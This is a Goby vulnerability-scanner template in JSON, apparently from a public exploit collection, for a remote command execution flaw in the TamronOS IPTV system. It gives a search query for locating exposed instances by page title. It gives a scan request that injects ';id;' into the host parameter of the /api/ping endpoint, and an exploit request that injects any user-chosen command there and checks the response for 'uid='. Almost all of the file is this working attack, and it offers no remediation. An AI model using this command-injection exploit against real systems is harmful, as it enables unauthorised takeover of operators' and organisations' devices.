Goby/json/TamronOS_IPTV_system_RCE.json

97 lines
3.4 KiB
JSON

{
"Name": "TamronOS IPTV system RCE",
"Level": "3",
"Tags": [
"rce"
],
"GobyQuery": "title=\"TamronOS IPTV系统\"",
"Description": "TamronOS IPTV system is a set of live and on-demand system solutions for broadband operators, hotels, schools and other high-traffic scenarios.",
"Product": "TamronOS IPTV",
"Homepage": "http://www.tamronos.com/",
"Author": "",
"Impact": "TamronOS IPTV system RCE",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": [
{
"Name": "cmd",
"Type": "input",
"Value": "id"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/ping?count=5&host=;id;&port=80&source=1.1.1.1&type=icmp",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/ping?count=5&host=;{{{cmd}}};&port=80&source=1.1.1.1&type=icmp",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}